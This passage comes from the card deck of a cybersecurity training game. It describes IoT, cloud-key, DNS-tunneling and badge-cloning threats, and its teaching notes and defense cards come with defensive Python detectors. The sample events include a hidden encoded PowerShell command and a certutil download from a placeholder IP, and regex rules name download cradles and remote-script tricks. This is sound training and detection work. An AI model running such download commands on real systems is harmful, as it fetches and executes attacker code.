│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your network monitoring detects    │
│ unusual traffic from an IoT device  │
│ (surveillance camera) in the        │
│ building. The device is             │
│ communicating with a command server │
│ overseas and tunneling internal     │
│ network traffic.                    │
│ Your asset inventory shows this     │
│ camera was never formally added to  │
│ any security program. It's running  │
│ firmware from 2019 with known       │
│ vulnerabilities."                   │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ IoT devices are often neglected in  │
│ security programs (cameras,         │
│ printers, thermostats, building     │
│ automation).                        │
│ They run outdated firmware and have │
│ weak or default credentials. Once   │
│ compromised, they provide network   │
│ access and can pivot to critical    │
│ systems. Many organizations don't   │
│ inventory or monitor IoT devices.   │
│                                     │
│ DETECTION DIFFICULTY: Medium        │
│ Requires network monitoring and     │
│ device inventory practices.         │
└─────────────────────────────────────┘

Cloud API Abuse

Card T-18: Cloud API Token Theft & Abuse

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ CLOUD API TOKEN THEFT & ABUSE       │
├─────────────────────────────────────┤
│ Step:    PIVOT & ESCALATE           │
│ Vector:  CREDENTIAL ABUSE           │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your AWS CloudTrail logs show API  │
│ calls from unusual IP addresses     │
│ using API keys belonging to a       │
│ developer who left the company 6    │
│ months ago. The calls are creating  │
│ new IAM users, accessing S3 buckets │
│ with customer data, and launching   │
│ EC2 instances in regions where you  │
│ don't normally operate. The API key │
│ was embedded in old GitHub          │
│ repository code."                   │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Cloud API tokens/keys are often     │
│ exposed in code repositories or     │
│ configuration files. Once exposed,  │
│ they provide direct access to cloud │
│ resources. Attackers can spin up    │
│ resources, steal data, or deploy    │
│ cryptominers. Many organizations    │
│ fail to rotate or revoke old API    │
│ keys. Detection requires:           │
│ - API audit logging                 │
│ - Anomalous API pattern detection   │
│ - Key rotation policies             │
│ - Secrets scanning in repos         │
│                                     │
│ DETECTION DIFFICULTY: Medium-High   │
│ Requires cloud monitoring and       │
│ secrets management practices.       │
└─────────────────────────────────────┘
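For Threat Orchestrators who want to show what the CloudTrail clue above looks like as detection logic, here is an added example in Python (it is not part of the RetroVerse deck or any vendor's product). It scores constructed CloudTrail-style records against three signals taken from the card: a key belonging to a departed user, calls from outside the company's known egress ranges and regions, and high-impact IAM/EC2/S3 actions. The known-region set, the egress range, the departed-user list and the event records are all constructed assumptions.

```python
"""Flag CloudTrail events that fit the T-18 pattern: an access key tied to a
departed user, calls from outside the organisation's normal IP ranges and
regions, and high-impact IAM/EC2/S3 actions. Added example; the baseline
sets, the offboarding dates and the event records are all constructed."""
import ipaddress
from datetime import datetime, timezone

# Constructed baseline: regions the org uses, its egress range (TEST-NET-3),
# and users whose keys should have been revoked on the date shown.
KNOWN_REGIONS = {"us-east-1", "eu-west-1"}
CORP_EGRESS = [ipaddress.ip_network("203.0.113.0/24")]
DEPARTED_USERS = {"jdoe": datetime(2024, 1, 15, tzinfo=timezone.utc)}

# Actions that build persistence, widen access, reach data, or blind logging.
HIGH_IMPACT = {
    "CreateUser", "CreateAccessKey", "AttachUserPolicy", "PutUserPolicy",
    "RunInstances", "GetObject", "ListBuckets", "StopLogging", "DeleteTrail",
}

def is_corporate_ip(ip: str) -> bool:
    """CloudTrail puts a service hostname here for service-initiated calls;
    those are not attacker-originated, so they pass this check."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return ip.endswith(".amazonaws.com")
    return any(addr in net for net in CORP_EGRESS)

def score_event(ev: dict) -> list:
    """Return the reasons an event is suspicious (empty list = clean)."""
    reasons = []
    user = ev["userIdentity"].get("userName", "")
    when = datetime.fromisoformat(ev["eventTime"].replace("Z", "+00:00"))
    if user in DEPARTED_USERS and when > DEPARTED_USERS[user]:
        reasons.append(f"key of departed user {user} used after offboarding")
    if not is_corporate_ip(ev["sourceIPAddress"]):
        reasons.append(f"source {ev['sourceIPAddress']} outside corporate egress")
    if ev["awsRegion"] not in KNOWN_REGIONS:
        reasons.append(f"activity in unused region {ev['awsRegion']}")
    if ev["eventName"] in HIGH_IMPACT:
        reasons.append(f"high-impact action {ev['eventName']}")
    return reasons

def triage(events: list) -> dict:
    """Group events carrying two or more signals by access key, so the
    responder sees which key to disable first rather than a pile of alerts."""
    by_key = {}
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= 2:            # one weak signal alone is noise
            key = ev["userIdentity"].get("accessKeyId", "?")
            by_key.setdefault(key, []).append((ev["eventName"], reasons))
    return by_key

# Constructed CloudTrail-style records, trimmed to the fields used above.
SAMPLE_EVENTS = [
    {"eventTime": "2024-07-02T03:14:07Z", "eventName": "CreateUser",
     "awsRegion": "us-east-1", "sourceIPAddress": "198.51.100.23",
     "userIdentity": {"userName": "jdoe", "accessKeyId": "AKIAEXAMPLE000001"}},
    {"eventTime": "2024-07-02T03:15:40Z", "eventName": "RunInstances",
     "awsRegion": "ap-southeast-2", "sourceIPAddress": "198.51.100.23",
     "userIdentity": {"userName": "jdoe", "accessKeyId": "AKIAEXAMPLE000001"}},
    {"eventTime": "2024-07-02T09:00:00Z", "eventName": "DescribeInstances",
     "awsRegion": "us-east-1", "sourceIPAddress": "203.0.113.10",
     "userIdentity": {"userName": "ops-bot", "accessKeyId": "AKIAEXAMPLE000002"}},
]

if __name__ == "__main__":
    for key, hits in triage(SAMPLE_EVENTS).items():
        print(f"DISABLE {key}:")
        for name, reasons in hits:
            print(f"  {name}: " + "; ".join(reasons))
```

Hits are grouped per access key because the first containment step is to disable that key (in AWS, `aws iam update-access-key --status Inactive`) and then hunt for the IAM users, keys and instances it created while it was live; the departed-user check only works if offboarding dates are actually recorded somewhere the detection can read.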

DNS Tunneling for Data Exfiltration

Card T-19: DNS Tunneling Data Exfiltration

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ DNS TUNNELING DATA EXFILTRATION     │
├─────────────────────────────────────┤
│ Step:    C2 & EXFIL                 │
│ Vector:  DATA EXFIL                 │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your DNS query logs show massive   │
│ volume of unusual subdomains being  │
│ queried through an external DNS     │
│ resolver. The subdomain names look  │
│ like Base64-encoded data. Queries   │
│ are happening in steady intervals.  │
│ Query timestamps align with your    │
│ database being accessed. Your DLP   │
│ didn't flag anything because DNS is │
│ typically trusted."                 │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ DNS tunneling encodes data in DNS   │
│ queries to bypass firewalls and DLP │
│ systems. Organizations often allow  │
│ DNS traffic without inspection. DNS │
│ queries are typically high-volume   │
│ and hard to distinguish from normal │
│ activity. Attackers can exfil small │
│ amounts of data over weeks.         │
│ Defense requires:                   │
│ - DNS query content analysis        │
│ - Anomalous query pattern detection │
│ - DNS rate limiting                 │
│ - External DNS access restrictions  │
│                                     │
│ DETECTION DIFFICULTY: Very High     │
│ Requires specialized DNS monitoring │
│ tools and baseline analysis.        │
└─────────────────────────────────────┘
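The "DNS query content analysis" and "anomalous query pattern detection" the card calls for can be shown concretely. The following is an added example in Python, not RetroVerse material: it groups a constructed DNS query log per client and parent domain and looks for the indicators named on the card (long, high-entropy labels that never repeat, a steady beacon cadence, and record types that carry data back down). The log format, the sample lines and every threshold are constructed assumptions that a real deployment would tune against its own baseline.

```python
"""Score DNS query logs for the tunneling indicators T-19 describes: long,
high-entropy labels, a high ratio of never-repeated subdomains under one
parent domain, steady cadence, and record types that carry data back down.
Added example; the log lines and thresholds are constructed assumptions."""
import math
from collections import defaultdict

def shannon_entropy(s: str) -> float:
    """Bits per character: ~4-5 for base32/base64 payloads, low for words."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def parent_domain(qname: str) -> str:
    """Crude eTLD+1 (last two labels). Real code should use the public
    suffix list so that 'example.co.uk' is not split wrongly."""
    return ".".join(qname.rstrip(".").split(".")[-2:])

def parse_line(line: str):
    """Constructed log format: '<epoch> <client_ip> <qname> <qtype>'."""
    ts, client, qname, qtype = line.split()
    return float(ts), client, qname.lower(), qtype

def analyse(lines, min_queries=5, min_unique_ratio=0.9,
            min_label_len=30, min_entropy=3.5, max_jitter=1.0):
    """Group queries per (client, parent domain); return the groups showing
    at least three independent tunneling indicators, with the evidence."""
    groups = defaultdict(list)
    for line in lines:
        ts, client, qname, qtype = parse_line(line)
        groups[(client, parent_domain(qname))].append((ts, qname, qtype))

    suspects = {}
    for (client, domain), qs in groups.items():
        if len(qs) < min_queries:
            continue
        names = [q[1] for q in qs]
        unique_ratio = len(set(names)) / len(names)
        # The data-carrying part is everything left of the parent domain.
        payloads = [n[: -len(domain) - 1] for n in names]
        avg_len = sum(map(len, payloads)) / len(payloads)
        avg_ent = sum(map(shannon_entropy, payloads)) / len(payloads)
        times = sorted(q[0] for q in qs)
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean_gap = sum(gaps) / len(gaps)
        jitter = max(abs(g - mean_gap) for g in gaps)
        data_types = sum(1 for q in qs if q[2] in ("TXT", "NULL", "CNAME"))

        evidence = []
        if unique_ratio >= min_unique_ratio:
            evidence.append(f"{unique_ratio:.0%} of {len(qs)} queries never repeat")
        if avg_len >= min_label_len:
            evidence.append(f"avg payload label {avg_len:.0f} chars")
        if avg_ent >= min_entropy:
            evidence.append(f"avg label entropy {avg_ent:.2f} bits/char")
        if jitter <= max_jitter:
            evidence.append(f"steady cadence, one query every ~{mean_gap:.0f}s")
        if data_types:
            evidence.append(f"{data_types} TXT/NULL/CNAME queries (downstream channel)")
        if len(evidence) >= 3:
            suspects[(client, domain)] = evidence
    return suspects

# Constructed sample: one host pushing encoded data every 30 s, one host
# doing ordinary lookups.
SAMPLE_LOG = [
    "1720000000 10.0.5.21 mfrggzdfmztwq2lknnwg23tpobyxe43uov3ho6dz.upd-cdn.example TXT",
    "1720000030 10.0.5.21 pe3dolrqgaydcmrrgqzdknjwg43tmojtgy2dkmzw.upd-cdn.example TXT",
    "1720000060 10.0.5.21 ha4tqobqgeydambqgmydmmjrge4tkmzsgq3dqnjs.upd-cdn.example TXT",
    "1720000090 10.0.5.21 gy2tqmjzgi3tgmbqgu4dcmrtgizdkmrxgu3tenbz.upd-cdn.example TXT",
    "1720000120 10.0.5.21 mnqw4ic4f3yc6qbbom5vyqnzysdchsqndjkpy7kd.upd-cdn.example TXT",
    "1720000150 10.0.5.21 lnzgyzdtmzqxg5lcnfzhizlcg43tombwgy2dqmjz.upd-cdn.example TXT",
    "1720000003 10.0.5.22 www.example.com A",
    "1720000040 10.0.5.22 mail.example.com A",
    "1720000047 10.0.5.22 www.example.com A",
    "1720000170 10.0.5.22 cdn.example.com A",
    "1720000172 10.0.5.22 www.example.com A",
    "1720000300 10.0.5.22 mail.example.com AAAA",
]

if __name__ == "__main__":
    for (client, domain), evidence in analyse(SAMPLE_LOG).items():
        print(f"{client} -> {domain}")
        for e in evidence:
            print("  -", e)
```

Requiring three independent indicators is what keeps CDN and anti-virus domains (which also generate many unique, hash-like subdomains) from flooding the queue; the cadence and record-type checks are the ones those legitimate sources usually fail. The same grouping works on the "external DNS resolver" clue from the card: a client talking to any resolver other than the corporate one should be its own alert before any content analysis runs.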

Physical Security Bypass

Card T-20: Physical Access + Badge Cloning Attack

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ PHYSICAL ACCESS + BADGE CLONING     │
│ ATTACK                              │
├─────────────────────────────────────┤
│ Step:    INITIAL COMPROMISE         │
│ Vector:  CREDENTIAL ABUSE           │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your security team discovers that  │
│ an RFID badge belonging to a        │
│ manager was cloned using a portable │
│ reader. The cloned badge was used   │
│ to gain access to your secure data  │
│ center after-hours. Badge access    │
│ logs are timestamped, but the       │
│ person's schedule shows they weren't│
│ in the office that evening. Your    │
│ server room CCTV captured footage   │
│ of an unknown individual installing │
│ a wireless device in the network    │
│ rack."                              │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Physical security is often          │
│ overlooked in cybersecurity         │
│ programs. RFID badges can be cloned │
│ with inexpensive readers. Once      │
│ inside the data center, attackers   │
│ can install rogue network devices,  │
│ steal hardware, or gain console     │
│ access to servers. Defense requires:│
│ - Encrypted badge technology        │
│ - Multi-factor access (biometric)   │
│ - CCTV monitoring                   │
│ - Environmental controls            │
│ - Equipment inventory tracking      │
│ - Badge deactivation on exit        │
│                                     │
│ DETECTION DIFFICULTY: High          │
│ Requires integration of physical    │
│ and cyber security monitoring.      │
└─────────────────────────────────────┘

Integrating Expansion Threats into Your Game

Attack Vector Summary (Expansion Cards)

Suggested Scenario Combinations

Scenario 4: "Supply Chain Nightmare" (5-card chain - Expert)

Teaches: Third-party risk management, vendor security assessment, incident response at scale

1. Compromised Software Vendor Update (Initial Compromise) → MALWARE
2. Lateral Movement via SMB (Pivot & Escalate) → NETWORK
3. Scheduled Task Persistence (Persistence) → MALWARE
4. Beaconing to C2 Server (C2 & Exfil) → NETWORK
5. SQL Database Exfiltration (C2 & Exfil) → DATA EXFIL

Special Rule: Reveal this threat to 3+ teams (representing industry-wide detection). First team to detect gains +20 Budget (represents vendor advisory advantage).

Scenario 5: "Insider Threat Explosion" (4-card chain - Intermediate)

Teaches: Insider risk detection, privileged access management, offboarding procedures

1. Disgruntled Employee Sabotage (Pivot & Escalate) → MALWARE
2. Lateral Movement via SMB (Pivot & Escalate) → NETWORK
3. Mimikatz Credential Dumping (Pivot & Escalate) → CREDENTIAL ABUSE
4. Malicious Insider Data Theft (C2 & Exfil) → DATA EXFIL

Special Rule: The employee's offboarding checklist is partially incomplete. Teams get a -2 penalty to detect the first insider threat (represents delayed detection in real situations).

Scenario 6: "Modern Infrastructure Attack" (4-card chain - Expert)

Teaches: IoT security, cloud security, API management, defense breadth

1. Compromised IoT Device as Pivot Point (Initial Compromise) → NETWORK
2. Lateral Movement via SMB (Pivot & Escalate) → NETWORK
3. Cloud API Token Theft & Abuse (Pivot & Escalate) → CREDENTIAL ABUSE
4. DNS Tunneling Data Exfiltration (C2 & Exfil) → DATA EXFIL

Parallel threat: Teams must defend against both cloud and on-premises infrastructure simultaneously.

Scenario 7: "Physical Meets Cyber" (4-card chain - Intermediate)

Teaches: Physical security integration, environmental controls, holistic security

1. Physical Access + Badge Cloning (Initial Compromise) → CREDENTIAL ABUSE
2. Lateral Movement via SMB (Pivot & Escalate) → NETWORK
3. Scheduled Task Persistence (Persistence) → MALWARE
4. Ransomware Payload Deployment (C2 & Exfil) → MALWARE

Special Rule: The first defense deployed must address the physical security aspect (badge systems, CCTV review, environmental controls). Teams get a narrative bonus: "Your physical security team noticed the intruder before full compromise."

Scenario 8: "Supply Chain + Insider Collusion" (5-card chain - Hard)

Teaches: Complex attack coordination, detecting collusion, multi-vector threats

1. Malicious Third-Party Library Injection (Initial Compromise) → MALWARE
2. Disgruntled Employee Sabotage (Pivot & Escalate) → MALWARE
3. Cloud API Token Theft & Abuse (Pivot & Escalate) → CREDENTIAL ABUSE
4. DNS Tunneling Data Exfiltration (C2 & Exfil) → DATA EXFIL
5. Malicious Insider Data Theft (C2 & Exfil) → DATA EXFIL

Special Rule: Two threats must be revealed to understand the full scope (supply chain + insider collaboration). Incomplete investigation leads to missed detection of the insider component.


Recommended Defense Cards for Expansion Threats

(v2.2) Entries now cite real card IDs from the core deck (D-01 to D-24) and expansion deck (D-25 to D-43, see advanced-defenses.md). Concepts without a printed card are marked (custom — not in deck) and make good custom-card projects.

For Supply Chain Attacks (T-13, T-14)

For Insider Threats (T-15, T-16)

For IoT Device Compromise (T-17)

For Cloud API Abuse (T-18)

For DNS Tunneling (T-19)

For Physical Security Bypass (T-20)


Difficulty Adjustments Using Expansion Cards

Easy + Expansion (6-card chain)

Medium + Expansion (4-5 card chains with expansion)

Hard + Expansion (5+ card chains with 2+ expansion cards)


Teaching Notes for Threat Orchestrators

Supply Chain Attacks (T-13, T-14)

Real-world context:
- SolarWinds (2020) - roughly 18,000 customers downloaded the trojanized Orion update
- 3CX (2023) - desktop app trojanized through a compromised build environment
- XcodeGhost (2015) - a tampered copy of the Xcode developer tool injected malware into every app built with it
- Typosquatted packages are discovered on npm/PyPI every month

Discussion points after reveal:
- "How do you verify software authenticity?"
- "What's the difference between detecting supply chain compromises vs. traditional malware?"
- "Why is this harder to detect than direct attacks?"

Insider Threats (T-15, T-16)

Real-world context:
- Roughly a third of breaches involve internal actors (Verizon DBIR; the share varies by year and counts error and misuse as well as malice)
- Manning, Snowden, Reality Winner cases (government sector)
- Thousands of employee theft cases in financial/tech industries

Discussion points after reveal:
- "How would you detect insider threat indicators before damage occurs?"
- "Why is offboarding security often weak?"
- "What's the difference between a malicious insider and a negligent employee?"

IoT Device Compromise (T-17)

Real-world context:
- Mirai botnet (2016) - hundreds of thousands of compromised cameras, DVRs and routers, recruited simply by logging in with factory-default credentials
- Connected cameras, printers, thermostats often neglected
- "Shadow IT" problem in many organizations

Discussion points after reveal:
- "Should IoT devices be on the same network as critical systems?"
- "How do you patch thousands of IoT devices?"
- "Why are credentials often factory-default on IoT?"

Cloud API Abuse (T-18)

Real-world context:
- Cloud credentials are committed to public GitHub repositories every day; GitHub's secret scanning and AWS's automatic quarantine of keys found in public repos exist because of it
- Tesla (2018) - an unauthenticated Kubernetes dashboard exposed AWS credentials, which attackers used to run cryptominers
- Capital One (2019) - an SSRF flaw in a misconfigured WAF instance yielded the temporary credentials of an over-privileged IAM role, which were then used to read customer data from S3

Discussion points after reveal:
- "How do you manage API keys for thousands of developers?"
- "Why is secrets rotation hard in practice?"
- "How would you know if someone used your AWS API key?"

DNS Tunneling (T-19)

Real-world context:
- Used by the open-source DNSExfiltrator tool and by malware attributed to the OilRig and Turla groups
- Hard to detect because DNS is typically trusted and rarely inspected
- A tunnel throttled to stay stealthy may push only tens of KB per hour (the ~20 KB/hour often quoted is in that range); unthrottled tunnels such as iodine or dnscat2 move orders of magnitude more, but are also far easier to spot

Discussion points after reveal:
- "Why is DNS hard to monitor?"
- "What would a normal DNS query pattern look like?"
- "How would you distinguish data exfil from normal DNS activity?"

Physical Security Bypass (T-20)

Real-world context:
- RFID cloning demonstrated on hotel keys and building badges; low-frequency 125 kHz proximity cards clone in seconds with a handheld reader
- Rogue network devices found in data centers and office networks (the 2013 Target breach is often cited here, but it actually began with a third-party HVAC vendor's network credentials and belongs with the supply chain notes)
- USB drops with malware remain effective attack vectors

Discussion points after reveal:
- "Should cybersecurity teams care about physical security?"
- "How do you audit data center access?"
- "What's harder to defend: cyber or physical attacks?"


Expansion Threat Card Deck Summary

Card   Title                                    Step               Vector            Difficulty
T-13   Compromised Software Vendor Update       INITIAL            MALWARE           Hard
T-14   Malicious Third-Party Library Injection  INITIAL            MALWARE           Medium
T-15   Malicious Insider Data Theft             C2 & EXFIL         DATA EXFIL        Very Hard
T-16   Disgruntled Employee Sabotage            PIVOT & ESCALATE   MALWARE           Hard
T-17   Compromised IoT Device as Pivot Point    INITIAL            NETWORK           Medium
T-18   Cloud API Token Theft & Abuse            PIVOT & ESCALATE   CREDENTIAL ABUSE  Hard
T-19   DNS Tunneling Data Exfiltration          C2 & EXFIL         DATA EXFIL        Very Hard
T-20   Physical Access + Badge Cloning          INITIAL            CREDENTIAL ABUSE  Hard

Quick Integration Checklist


Expansion Threat Card Set for Incident Zero
Use these cards to add modern threat scenarios to your game
For discussion and teaching notes, see above sections

cards/incident-response/expansion-deck/advanced-defenses.md

Incident Zero: Expansion Defense Cards

Advanced Security Controls & Defensive Capabilities

This document provides additional Defense Cards for expanding Incident Zero gameplay beyond the base 24-card deck. These cards introduce modern security architectures and advanced defensive capabilities that complement the base game.

Note (v2.2): These expansion defenses were renumbered from D-19–D-37 to D-25–D-43 to avoid colliding with core deck cards D-19–D-24 (see ../core-deck/threat-defense-cards.md).


ADDITIONAL DEFENSE CARDS (19 Cards)

Application Whitelisting Defenses

Card D-25: Application Whitelisting (Basic)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ APPLICATION WHITELISTING            │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy application whitelisting on  │
│ critical workstations and servers.  │
│ Maintain an approved applications   │
│ list (Word, Excel, Chrome, etc.).   │
│ Block execution of any unapproved   │
│ binaries. Use AppLocker (Windows)   │
│ or similar tools.                   │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Prevents execution of malware and   │
│ unauthorized tools. Attackers cannot│
│ run ransomware, backdoors, or       │
│ penetration tools if they're not on │
│ the whitelist. Also stops unknown   │
│ (zero-day) malware, since anything  │
│ not listed or signed by an approved │
│ publisher is blocked by default.    │
│                                     │
│ LIMITATION: False positives if      │
│ maintenance is poor. Users may      │
│ struggle with legitimate tools      │
│ being blocked.                      │
└─────────────────────────────────────┘

Card D-26: Advanced Application Control with AI

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ ADVANCED APPLICATION CONTROL WITH AI│
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy AI-powered application       │
│ control that learns normal program  │
│ execution patterns. System builds a │
│ baseline of legitimate applications │
│ and automatically flags deviations. │
│ Prevents execution of suspicious    │
│ or anomalous applications.          │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Combines whitelisting with behavior │
│ analysis. Adapts to legitimate new  │
│ applications without manual updates.│
│ Catches malware that slips past     │
│ path- or publisher-based allow rules│
│ (a payload dropped into an allowed  │
│ path, or an abused signed tool).    │
│ Reduces false positives.            │
│                                     │
│ LEARNING CURVE: Requires baseline   │
│ training period (1-2 weeks).        │
└─────────────────────────────────────┘

Card D-27: Living-Off-The-Land Blocker (ELITE)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ LIVING-OFF-THE-LAND BLOCKER         │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy advanced script and tool     │
│ control that restricts execution of │
│ PowerShell, WScript, cmd.exe, and   │
│ other "living-off-the-land" tools.  │
│ Allow only specific, monitored usage│
│ with strong justification logging.  │
│ Monitor for obfuscation patterns.   │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Directly targets attacker techniques│
│ used in privilege escalation and    │
│ lateral movement (scheduled tasks,  │
│ registry modification, credential   │
│ dumping). Makes PowerShell and cmd  │
│ attacks extremely difficult.        │
│ Works especially well with EDR.     │
│                                     │
│ IMPACT: May break legitimate admin  │
│ tasks; requires strong change       │
│ management.                         │
└─────────────────────────────────────┘

Behavioral Analytics Defenses

Card D-28: Baseline Behavior Learning System (Advanced)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ BASELINE BEHAVIOR LEARNING SYSTEM   │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy behavioral analytics that    │
│ establishes baseline profiles for   │
│ users, systems, and network traffic.│
│ System learns what "normal" looks   │
│ like, then alerts on deviations.    │
│ Monitors: login times, file access, │
│ network destinations, resource usage.│
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Detects anomalies like:             │
│ - Unusual login geography/time      │
│ - Data access patterns changing     │
│ - Lateral movement via SMB          │
│ - New network destinations          │
│ Works best as a *combination* with  │
│ other tools. Requires good baseline  │
│ data (1-2 weeks of normal traffic). │
│                                     │
│ DETECTS: Insider threats,           │
│ compromised credentials, APT tactics.│
└─────────────────────────────────────┘

Card D-29: Process Behavior Analysis (Advanced)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ PROCESS BEHAVIOR ANALYSIS           │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy process-level behavioral     │
│ monitoring that learns what each    │
│ application normally does (file I/O,│
│ network calls, registry access,     │
│ child processes spawned). Blocks    │
│ anomalous behavior from legitimate  │
│ binaries.                           │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Catches:                            │
│ - Legitimate apps compromised by    │
│  supply chain attack                │
│ - Process injection attacks         │
│ - Unexpected child process creation │
│ - Anomalous registry/file writes    │
│ Example: Word.exe normally doesn't  │
│ spawn PowerShell; if it does, block │
│ and alert.                          │
│                                     │
│ DETECTS: Zero-day malware, APT      │
│ techniques, supply chain compromises.│
└─────────────────────────────────────┘
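The "Word.exe normally doesn't spawn PowerShell" rule on D-29 and the obfuscation-pattern monitoring on D-27 are both parent/child and command-line checks, so one added example covers both. This is Python written for this page, not RetroVerse material and not any EDR vendor's logic; the events are constructed in the shape of Sysmon Event ID 1 fields (ParentImage, Image, CommandLine), and the rule set is a starting point a detection engineer would extend, not a complete catalogue.

```python
"""Evaluate process-creation events against the parent/child and command-line
rules that D-27 (living-off-the-land control) and D-29 (process behaviour
analysis) describe. Added example; the events are constructed Sysmon-style
records and the rules are a starting point, not any vendor's logic."""
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
          "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# (rule name, pattern matched against the lower-cased command line)
CMDLINE_RULES = [
    ("powershell encoded command",
     re.compile(r"\s-e(nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}")),
    ("powershell download cradle",
     re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b")),
    ("powershell hidden window / policy bypass",
     re.compile(r"-w(indowstyle)?\s+hidden|-e(p|xecutionpolicy)\s+bypass")),
    ("certutil used as a downloader",
     re.compile(r"certutil(\.exe)?\s.*-urlcache")),
    ("regsvr32 remote scriptlet (squiblydoo)",
     re.compile(r"regsvr32(\.exe)?\s.*/i:https?://")),
    ("mshta executing remote or inline script",
     re.compile(r"mshta(\.exe)?\s+\"?(https?:|javascript:|vbscript:)")),
]

def basename(path: str) -> str:
    """Image fields are full Windows paths; compare on the file name only."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def evaluate(event: dict):
    """Return (verdict, reasons): 'block' when an Office app spawns a shell
    or script host, 'alert' for a suspicious command line, else 'allow'."""
    parent = basename(event["ParentImage"])
    child = basename(event["Image"])
    cmd = event.get("CommandLine", "").lower()
    reasons = []
    lineage_hit = parent in OFFICE_APPS and child in SHELLS
    if lineage_hit:
        reasons.append(f"{parent} spawned {child} (documents should not launch shells)")
    for name, pattern in CMDLINE_RULES:
        if pattern.search(cmd):
            reasons.append(name)
    if lineage_hit:
        return "block", reasons
    if reasons:
        return "alert", reasons
    return "allow", reasons

# Constructed events: a macro launching hidden encoded PowerShell, a benign
# shell, a certutil download, and a normal service host.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -enc "
                    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir C:\\Users\\alice\\Documents"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://198.51.100.7/upd.dat upd.dat"},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs -p"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        verdict, reasons = evaluate(ev)
        print(f"{verdict:5s} {basename(ev['ParentImage'])} -> {basename(ev['Image'])}")
        for r in reasons:
            print("       ", r)
```

The lineage rule is the one worth enforcing in block mode, because it has almost no legitimate exceptions; the command-line rules belong in alert mode first, since administrators really do run `-EncodedCommand` from deployment tooling, and the card's "strong justification logging" is what turns those alerts into an allow-list of known jobs.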

Card D-30: Machine Learning Anomaly Detection (ELITE)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ MACHINE LEARNING ANOMALY DETECTION  │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy ML models trained on terabytes│
│ of security data. System detects    │
│ subtle anomalies humans would miss: │
│ subtle timing changes, rare resource│
│ combinations, statistical outliers. │
│ Continuously retrains on new data.  │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Catches advanced attacks that bypass│
│ signature and rule-based systems.   │
│ Detects:                            │
│ - Polymorphic malware variations    │
│ - Advanced persistent threats (APT) │
│ - Zero-day exploits (by behavior)   │
│ - Sophisticated insider threats     │
│ - Supply chain compromises          │
│                                     │
│ TRADE-OFF: False positives require  │
│ human analysis. Requires large      │
│ datasets for training.              │
└─────────────────────────────────────┘

Container Security Defenses

Card D-31: Container Image Scanning (Basic)

